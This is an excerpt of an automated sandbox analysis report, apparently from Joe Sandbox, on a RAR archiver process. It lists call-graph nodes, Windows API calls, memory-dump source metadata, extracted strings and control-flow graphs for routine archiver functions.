7ff618623e78 17 API calls __vcrt_getptd_noexit 39662->39664 39663->39658 39664->39651 39666 7ff6186297ba WideCharToMultiByte 39665->39666 39667 7ff61862985e 39665->39667 39666->39667 39671 7ff618629814 39666->39671 39669 7ff618629868 FreeEnvironmentStringsW 39667->39669 39670 7ff618623cef 39667->39670 39669->39670 39670->39658 39677 7ff618623d38 31 API calls 3 library calls 39670->39677 39678 7ff618624ab4 39671->39678 39674 7ff618629824 WideCharToMultiByte 39675 7ff61862984b 39674->39675 39676 7ff618624a74 __vcrt_getptd_noexit 15 API calls 39675->39676 39676->39667 39677->39661 39679 7ff618624aff 39678->39679 39684 7ff618624ac3 __vcrt_getptd_noexit 39678->39684 39685 7ff618624f3c 15 API calls memcpy_s 39679->39685 39681 7ff618624ae6 RtlAllocateHeap 39682 7ff618624afd 39681->39682 39681->39684 39682->39674 39682->39675 39683 7ff6186236c0 new 2 API calls 39683->39684 39684->39679 39684->39681 39684->39683 39685->39682 39687 7ff61860b496 GetProcAddress 39686->39687 39688 7ff6185f7e45 39686->39688 39689 7ff61860b4cb GetProcAddress 39687->39689 39690 7ff61860b4ae 39687->39690 39691 7ff6185d7a68 39688->39691 39689->39688 39690->39689 39692 7ff6185d7a76 39691->39692 39712 7ff618622ae4 39692->39712 39694 7ff6185d7a80 39695 7ff618622ae4 setbuf 60 API calls 39694->39695 39696 7ff6185d7a94 39695->39696 39721 7ff6185d7b44 GetStdHandle GetFileType 39696->39721 39699 7ff6185d7b44 3 API calls 39700 7ff6185d7aae 39699->39700 39701 7ff6185d7b44 3 API calls 39700->39701 39703 7ff6185d7abe 39701->39703 39702 7ff6185d7b12 39711 7ff6185dcd78 SetConsoleCtrlHandler 39702->39711 39705 7ff6185d7aeb 39703->39705 39724 7ff618622abc 31 API calls 2 library calls 39703->39724 39705->39702 39726 7ff618622abc 31 API calls 2 library calls 39705->39726 39706 7ff6185d7adf 39725 7ff618622b40 33 API calls 3 library calls 39706->39725 39709 7ff6185d7b06 39727 7ff618622b40 33 API calls 3 library calls 39709->39727 39713 7ff618622ae9 39712->39713 39714 7ff618627ee8 39713->39714 39716 7ff618627f23 39713->39716 39728 7ff618624f3c 15 API calls memcpy_s 39714->39728 39730 7ff618627d98 60 API calls 2 library calls 39716->39730 39717 7ff618627eed 39729 7ff618624e1c 31 API calls _invalid_parameter_noinfo 39717->39729 39720 7ff618627ef8 39720->39694 39722 7ff6185d7a9e 39721->39722 39723 7ff6185d7b61 GetConsoleMode 39721->39723 39722->39699 39723->39722 39724->39706 39725->39705 39726->39709 39727->39702 39728->39717 39729->39720 39730->39720 39731 7ff61860bb70 39734 7ff61860bb80 39731->39734 39743 7ff61860bae8 39734->39743 39736 7ff61860bb79 39738 7ff61860bbc8 SetEvent 39739 7ff61860bbd5 LeaveCriticalSection 39738->39739 39740 7ff61860bae8 67 API calls 39739->39740 39741 7ff61860bb97 39740->39741 39741->39736 39748 7ff6185d1690 39741->39748 39752 7ff61860b974 WaitForSingleObject 39743->39752 39746 7ff61860bb16 EnterCriticalSection LeaveCriticalSection 39747 7ff61860bb12 39746->39747 39747->39741 39749 7ff6185d16c2 EnterCriticalSection 39748->39749 39750 7ff6185d16a4 39748->39750 39749->39738 39749->39739 39750->39749 39760 7ff6185d1180 39750->39760 39753 7ff61860b986 GetLastError 39752->39753 39754 7ff61860b9b7 39752->39754 39758 7ff6185dca6c 48 API calls 3 library calls 39753->39758 39754->39746 39754->39747 39756 7ff61860b9a6 39759 7ff6185dca40 61 API calls _CxxThrowException 39756->39759 39758->39756 39759->39754 39761 7ff6185d11ab 39760->39761 39765 7ff6185d11b0 39760->39765 39770 7ff6185d17c8 216 API calls 2 library calls 39761->39770 39763 7ff6185d166a 39763->39750 39764 7ff6185f6d38 216 API calls 39764->39765 39765->39763 39765->39764 39766 7ff6185d1080 48 API calls 39765->39766 39768 7ff6185f6fe8 216 API calls 39765->39768 39769 7ff6185f6e90 216 API calls 39765->39769 39771 7ff6185d17c8 216 API calls 2 library calls 39765->39771 39766->39765 39768->39765 39769->39765 39770->39765 39771->39765 39772 7ff618629c74 39773 7ff618629c7c 39772->39773 39774 7ff618629cbb 39773->39774 39775 7ff618629cac 39773->39775 39776 7ff618629cc5 39774->39776 39794 7ff61862ce08 32 API calls 2 library calls 39774->39794 39793 7ff618624f3c 15 API calls memcpy_s 39775->39793 39781 7ff618624b8c 39776->39781 39780 7ff618629cb1 memcpy_s 39782 7ff618624bab 39781->39782 39783 7ff618624ba1 39781->39783 39784 7ff618624bb0 39782->39784 39791 7ff618624bb7 __vcrt_getptd_noexit 39782->39791 39785 7ff618624ab4 setbuf 16 API calls 39783->39785 39786 7ff618624a74 __vcrt_getptd_noexit 15 API calls 39784->39786 39788 7ff618624ba9 39785->39788 39786->39788 39787 7ff618624bf6 39795 7ff618624f3c 15 API calls memcpy_s 39787->39795 39788->39780 39790 7ff618624be0 RtlReAllocateHeap 39790->39788 39790->39791 39791->39787 39791->39790 39792 7ff6186236c0 new 2 API calls 39791->39792 39792->39791 39793->39780 39794->39776 39795->39788 39796 7ff6185c7a5b 39797 7ff6185c7a60 39796->39797 39798 7ff6185d9be0 14 API calls 39797->39798 39799 7ff6185c7af7 39797->39799 39798->39799 39800 7ff6185c7bda 39799->39800 39829 7ff6185e1e1c GetFileTime 39799->39829 39802 7ff6185cb540 147 API calls 39800->39802 39803 7ff6185c7bf8 39802->39803 39806 7ff6185c7c3e 39803->39806 39830 7ff618619b98 216 API calls 3 library calls 39803->39830 39805 7ff6185cb540 147 API calls 39808 7ff6185c7c9c 39805->39808 39806->39805 39807 7ff6185c7f89 39808->39807 39831 7ff6185e6378 39808->39831 39810 7ff6185c7cd7 39811 7ff6185e6378 4 API calls 39810->39811 39813 7ff6185c7cf3 39811->39813 39812 7ff6185c7de1 39819 7ff6185c7e4e 39812->39819 39836 7ff6185f98dc 39812->39836 39813->39812 39815 7ff6185c7d59 39813->39815 39816 7ff6185c7d38 39813->39816 39818 7ff61861a444 new 4 API calls 39815->39818 39817 7ff61861a444 new 4 API calls 39816->39817 39823 7ff6185c7d42 std::bad_alloc::bad_alloc 39817->39823 39818->39823 39842 7ff6185c1204 48 API calls 39819->39842 39821 7ff6185c7eb3 39824 7ff6185c7edb 39821->39824 39843 7ff6185f9680 39821->39843 39823->39812 39835 7ff61861ba34 RtlPcToFileHeader RaiseException 39823->39835 39849 7ff6185e6424 8 API calls _handle_error 39824->39849 39826 7ff6185c7f56 39828 7ff6185cb540 147 API calls 39826->39828 39828->39807 39829->39800 39830->39806 39832 7ff6185e6396 39831->39832 39834 7ff6185e63a0 39831->39834 39833 7ff61861a444 new 4 API calls 39832->39833 39833->39834 39834->39810 39835->39812 39837 7ff6185f993c 39836->39837 39838 7ff6185f9926 39836->39838 39840 7ff6185d90b8 75 API calls 39837->39840 39839 7ff6185d90b8 75 API calls 39838->39839 39841 7ff6185f9934 39839->39841 39840->39841 39841->39819 39842->39821 39848 7ff6185f96a4 39843->39848 39844 7ff6185f97d7 39845 7ff6185e2574 126 API calls 39845->39848 39847 7ff618619b98 216 API calls 39847->39848 39848->39844 39848->39845 39848->39847 39850 7ff6185e6498 72 API calls new 39848->39850 39849->39826 39850->39848 39851 7ff61860a924 39852 7ff61860a949 snprintf 39851->39852 39853 7ff61860a97f CompareStringA 39852->39853
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                                                              • API String ID: 0-1628410872
                                                                                                                                                                                                                                                              • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                                              • Instruction ID: 96eb7d299271095d4bcc2c87a4e598a49045f9307650ea93602114e3ff7f8a8d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3C2B47290C99281EBA49B3481441BD26D1EF01FB4F948335DE4ECB2CADE6DE546C3AC
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                                                                                              • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                                              • Instruction ID: e64e8e079d17c11f2234c249b4e6e5a8f57d3de70cd7213aa6ff707ef0810001
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A016D2AB08A5182E7409B26A9443296762EBC4FE0F188131DE4D83B68CF7DD98A8744
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 88f45f32f7d6f697d6459e58c3cfe5d2f6646924d00db2152a98e2005056ce91
                                                                                                                                                                                                                                                              • Instruction ID: e69ce35262e7ace30c205714b1a1461f1e2ad62c2bc2974f143ce6e34fcb0a28
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88f45f32f7d6f697d6459e58c3cfe5d2f6646924d00db2152a98e2005056ce91
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6371DD32A05A8586D744DF3AE8052EC73A1FBC8FA8F044135DB5DCB39ADF78A0519798

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 635 7ff618603ea8-7ff618603f03 call 7ff61861a5a0 call 7ff61861c8a0 640 7ff618603f05-7ff618603f3e GetModuleFileNameW call 7ff6185f4e14 call 7ff61860a9c0 635->640 641 7ff618603f40-7ff618603f50 call 7ff61860a9e8 635->641 644 7ff618603f55-7ff618603f79 call 7ff6185e1874 call 7ff6185e1e80 640->644 641->644 652 7ff618604692-7ff6186046c5 call 7ff6185e18ac call 7ff61861a610 644->652 653 7ff618603f7f-7ff618603f89 644->653 655 7ff618603fae-7ff618603feb call 7ff61861ec70 * 2 653->655 656 7ff618603f8b-7ff618603fac call 7ff6186011c0 * 2 653->656 668 7ff618603fef-7ff618603ff3 655->668 656->655 669 7ff6186040f2-7ff618604112 call 7ff6185e22e0 call 7ff61861eb90 668->669 670 7ff618603ff9-7ff61860402d call 7ff6185e2440 call 7ff6185e2150 668->670 669->652 679 7ff618604118-7ff618604131 call 7ff6185e2150 669->679 680 7ff618604033 670->680 681 7ff6186040bc-7ff6186040e2 call 7ff6185e22e0 670->681 692 7ff618604133-7ff618604136 679->692 693 7ff618604138-7ff61860414b call 7ff61861eb90 679->693 683 7ff61860403a-7ff61860403e 680->683 681->668 689 7ff6186040e8-7ff6186040ec 681->689 686 7ff618604064-7ff618604069 683->686 687 7ff618604040-7ff618604044 683->687 690 7ff61860406b-7ff618604070 686->690 691 7ff618604097-7ff61860409f 686->691 687->686 694 7ff618604046-7ff61860405e call 7ff618622290 687->694 689->652 689->669 690->691 695 7ff618604072-7ff618604078 690->695 696 7ff6186040a1 691->696 697 7ff6186040b7 691->697 698 7ff61860416f-7ff6186041b1 call 7ff61860a900 call 7ff61861eb90 692->698 693->652 710 7ff618604151-7ff61860416c call 7ff61860d54c call 7ff61861eb88 693->710 706 7ff6186040a3-7ff6186040a7 694->706 707 7ff618604060 694->707 702 7ff618604093 695->702 703 7ff61860407a-7ff618604091 call 7ff618621700 695->703 696->683 697->681 718 7ff6186041b3-7ff6186041bb call 7ff61861eb88 698->718 719 7ff6186041c0-7ff6186041d5 698->719 702->691 703->702 715 7ff6186040a9-7ff6186040b5 703->715 706->697 707->686 710->698 715->681 718->652 722 7ff6186045f0-7ff618604624 call 7ff618603884 call 7ff61861eb88 * 2 719->722 723 7ff6186041db 719->723 759 7ff61860464a-7ff618604691 call 7ff61861ec70 * 2 722->759 760 7ff618604626-7ff618604648 call 7ff6186011c0 * 2 722->760 726 7ff6186041e1-7ff6186041ee 723->726 728 7ff6186041f4-7ff6186041fa 726->728 729 7ff618604508-7ff618604513 726->729 732 7ff6186041fc-7ff618604202 728->732 733 7ff618604208-7ff61860420e 728->733 729->722 731 7ff618604519-7ff618604523 729->731 737 7ff618604585-7ff618604589 731->737 738 7ff618604525-7ff61860452b 731->738 732->729 732->733 734 7ff618604214-7ff61860425c 733->734 735 7ff6186043d0-7ff6186043e0 call 7ff61860a580 733->735 739 7ff618604261-7ff618604264 734->739 755 7ff6186044f0-7ff618604503 735->755 756 7ff6186043e6-7ff618604414 call 7ff61860a9e8 call 7ff61862172c 735->756 741 7ff6186045a3-7ff6186045d4 call 7ff618603884 737->741 742 7ff61860458b-7ff61860458f 737->742 744 7ff618604531-7ff618604539 738->744 745 7ff6186045db-7ff6186045de 738->745 747 7ff618604268-7ff618604270 739->747 741->745 742->741 749 7ff618604591-7ff618604597 742->749 752 7ff618604573-7ff61860457a 744->752 753 7ff61860453b-7ff61860453e 744->753 745->722 746 7ff6186045e0-7ff6186045e5 745->746 746->726 747->747 754 7ff618604272-7ff618604288 call 7ff618621700 747->754 749->745 758 7ff618604599-7ff6186045a1 749->758 757 7ff61860457e-7ff618604583 752->757 762 7ff618604540-7ff618604543 753->762 763 7ff61860456a-7ff618604571 753->763 778 7ff6186042a3 754->778 779 7ff61860428a-7ff618604295 754->779 755->729 756->755 787 7ff61860441a-7ff6186044a9 call 7ff61860d840 call 7ff61860a900 call 7ff61860a8c4 call 7ff61860a900 call 7ff6186215fc 756->787 757->745 758->745 759->652 760->759 764 7ff618604545-7ff618604548 762->764 765 7ff618604561-7ff618604568 762->765 763->757 770 7ff61860454a-7ff61860454d 764->770 771 7ff618604558-7ff61860455f 764->771 765->757 770->749 776 7ff61860454f-7ff618604556 770->776 771->757 776->757 786 7ff6186042a7-7ff6186042be 778->786 779->778 784 7ff618604297-7ff6186042a1 779->784 784->786 786->739 788 7ff6186042c0-7ff6186042c2 786->788 821 7ff6186044bf-7ff6186044cf 787->821 822 7ff6186044ab-7ff6186044bb 787->822 790 7ff6186042c4-7ff6186042d6 call 7ff61860a900 788->790 791 7ff6186042e6 788->791 797 7ff6186042db-7ff6186042e1 790->797 791->735 794 7ff6186042ec 791->794 795 7ff6186042f1-7ff6186042f7 794->795 798 7ff618604300-7ff618604303 795->798 799 7ff6186042f9-7ff6186042fe 795->799 801 7ff6186045d6 797->801 798->795 799->798 802 7ff618604305-7ff618604314 799->802 801->745 804 7ff61860433d-7ff618604347 802->804 805 7ff618604316-7ff618604320 802->805 809 7ff61860434d-7ff618604378 call 7ff61860d840 804->809 810 7ff6186045ea-7ff6186045ef call 7ff61861a774 804->810 808 7ff618604323-7ff618604327 805->808 808->804 813 7ff618604329-7ff61860433b 808->813 819 7ff61860439e-7ff6186043cb call 7ff61860470c 809->819 820 7ff61860437a-7ff618604399 call 7ff618621764 809->820 810->722 813->804 813->808 819->797 820->797 826 7ff6186044d2-7ff6186044d8 821->826 822->821 828 7ff6186044eb-7ff6186044ee 826->828 829 7ff6186044da-7ff6186044e5 826->829 828->826 829->801 829->828
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                                                              • API String ID: 602362809-1645646101
                                                                                                                                                                                                                                                              • Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                                                                                                                                                                                                                              • Instruction ID: 52b156811b0f7fe27b8d6cbf918231f144206850008f24821e5084d1439b7534
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E522B461B18E8285EB31DB35D4906B96361FF44BA8F804135EA4EC76D5EF2CE944E38C

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1405 7ff6185d4fd0-7ff6185d502d call 7ff61861a5a0 1408 7ff6185d502f-7ff6185d5037 1405->1408 1409 7ff6185d504d-7ff6185d5055 1405->1409 1408->1409 1412 7ff6185d5039-7ff6185d504b call 7ff61861c8a0 1408->1412 1410 7ff6185d506e-7ff6185d5089 call 7ff6185f420c 1409->1410 1411 7ff6185d5057-7ff6185d5069 call 7ff6185d481c 1409->1411 1418 7ff6185d509f-7ff6185d50b6 call 7ff61860db08 1410->1418 1419 7ff6185d508b-7ff6185d509d call 7ff61860a9c0 1410->1419 1411->1410 1412->1409 1412->1411 1424 7ff6185d511b-7ff6185d5131 call 7ff61861c8a0 1418->1424 1425 7ff6185d50b8-7ff6185d50c3 call 7ff61860a59c 1418->1425 1419->1424 1430 7ff6185d5203-7ff6185d520d call 7ff61860aa48 1424->1430 1431 7ff6185d5137-7ff6185d513e 1424->1431 1425->1424 1432 7ff6185d50c5-7ff6185d50cf call 7ff6185e3054 1425->1432 1439 7ff6185d5212-7ff6185d521c 1430->1439 1434 7ff6185d5140-7ff6185d5167 call 7ff6185f3f98 1431->1434 1435 7ff6185d516c-7ff6185d51be call 7ff61860aa1c call 7ff61860aa48 call 7ff618606e98 1431->1435 1432->1424 1441 7ff6185d50d1-7ff6185d5107 call 7ff61860a9e8 call 7ff61860a9c0 call 7ff6185e3054 1432->1441 1434->1435 1488 7ff6185d51d3-7ff6185d51e8 call 7ff618607a24 1435->1488 1443 7ff6185d5222 1439->1443 1444 7ff6185d52db-7ff6185d52e0 1439->1444 1441->1424 1526 7ff6185d5109-7ff6185d5116 call 7ff61860a9e8 1441->1526 1449 7ff6185d532f-7ff6185d5332 1443->1449 1450 7ff6185d5228-7ff6185d522d 1443->1450 1445 7ff6185d5453-7ff6185d5477 call 7ff6185df00c call 7ff6185df230 call 7ff6185df09c 1444->1445 1446 7ff6185d52e6-7ff6185d52e9 1444->1446 1505 7ff6185d547c-7ff6185d5483 1445->1505 1451 7ff6185d52ef-7ff6185d52f2 1446->1451 1452 7ff6185d5379-7ff6185d5382 1446->1452 1457 7ff6185d5334 1449->1457 1458 7ff6185d533b-7ff6185d533e 1449->1458 1450->1449 1455 7ff6185d5233-7ff6185d5236 1450->1455 1461 7ff6185d52f4-7ff6185d52f7 1451->1461 1462 7ff6185d536c-7ff6185d5374 call 7ff6186081cc 1451->1462 1467 7ff6185d5388-7ff6185d538b 1452->1467 1468 7ff6185d5449-7ff6185d5451 call 7ff6185feab8 1452->1468 1465 7ff6185d5290-7ff6185d5299 1455->1465 1466 7ff6185d5238-7ff6185d523b 1455->1466 1457->1458 1459 7ff6185d5340 1458->1459 1460 7ff6185d5347-7ff6185d5358 call 7ff6185c1230 call 7ff6185c4858 1458->1460 1459->1460 1517 7ff6185d535d 1460->1517 1461->1445 1471 7ff6185d52fd-7ff6185d5300 1461->1471 1462->1505 1473 7ff6185d52b2-7ff6185d52bd 1465->1473 1474 7ff6185d529b-7ff6185d529e 1465->1474 1476 7ff6185d5274-7ff6185d528b call 7ff6185c1230 call 7ff6185c48ec 1466->1476 1477 7ff6185d523d-7ff6185d5240 1466->1477 1480 7ff6185d5391-7ff6185d5397 1467->1480 1481 7ff6185d541b-7ff6185d5433 call 7ff61860ab1c 1467->1481 1468->1505 1471->1449 1495 7ff6185d5302-7ff6185d5305 1471->1495 1486 7ff6185d52ce-7ff6185d52d6 call 7ff6185f55e0 1473->1486 1489 7ff6185d52bf-7ff6185d52c9 call 7ff61860a9e8 1473->1489 1474->1486 1487 7ff6185d52a0-7ff6185d52a6 1474->1487 1533 7ff6185d535e-7ff6185d5362 call 7ff6185c14fc 1476->1533 1477->1445 1497 7ff6185d5246-7ff6185d5249 1477->1497 1492 7ff6185d540c-7ff6185d5419 call 7ff6185f54f8 call 7ff6185f51e4 1480->1492 1493 7ff6185d5399-7ff6185d539c 1480->1493 1481->1505 1518 7ff6185d5435-7ff6185d5447 call 7ff6185fbbd4 1481->1518 1486->1505 1501 7ff6185d5313-7ff6185d531d call 7ff6185d481c 1487->1501 1502 7ff6185d52a8-7ff6185d52ad call 7ff6185d7214 1487->1502 1536 7ff6185d51c0-7ff6185d51ce call 7ff61860aa48 1488->1536 1537 7ff6185d51ea-7ff6185d5201 call 7ff618606f68 call 7ff6185c14c0 1488->1537 1489->1486 1492->1505 1507 7ff6185d539e-7ff6185d53a1 1493->1507 1508 7ff6185d53ef-7ff6185d5401 call 7ff6185d45c8 1493->1508 1510 7ff6185d5322-7ff6185d532a call 7ff6185e67e0 1495->1510 1511 7ff6185d5307-7ff6185d530a 1495->1511 1497->1449 1513 7ff6185d524f-7ff6185d5252 1497->1513 1501->1505 1502->1505 1523 7ff6185d5485-7ff6185d548c call 7ff6185d8444 1505->1523 1524 7ff6185d5491-7ff6185d54bc call 7ff61861a610 1505->1524 1507->1501 1522 7ff6185d53a7-7ff6185d53d5 call 7ff6185d45c8 call 7ff61860ab1c 1507->1522 1508->1492 1510->1505 1511->1445 1525 7ff6185d5310 1511->1525 1513->1445 1529 7ff6185d5258-7ff6185d525b 1513->1529 1517->1533 1518->1505 1522->1505 1561 7ff6185d53db-7ff6185d53ea call 7ff6185fba9c 1522->1561 1523->1524 1525->1501 1526->1424 1544 7ff6185d526b-7ff6185d5272 1529->1544 1545 7ff6185d525d-7ff6185d5260 1529->1545 1555 7ff6185d5367 1533->1555 1536->1488 1537->1439 1544->1486 1545->1510 1554 7ff6185d5266 1545->1554 1554->1525 1555->1505 1561->1505
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
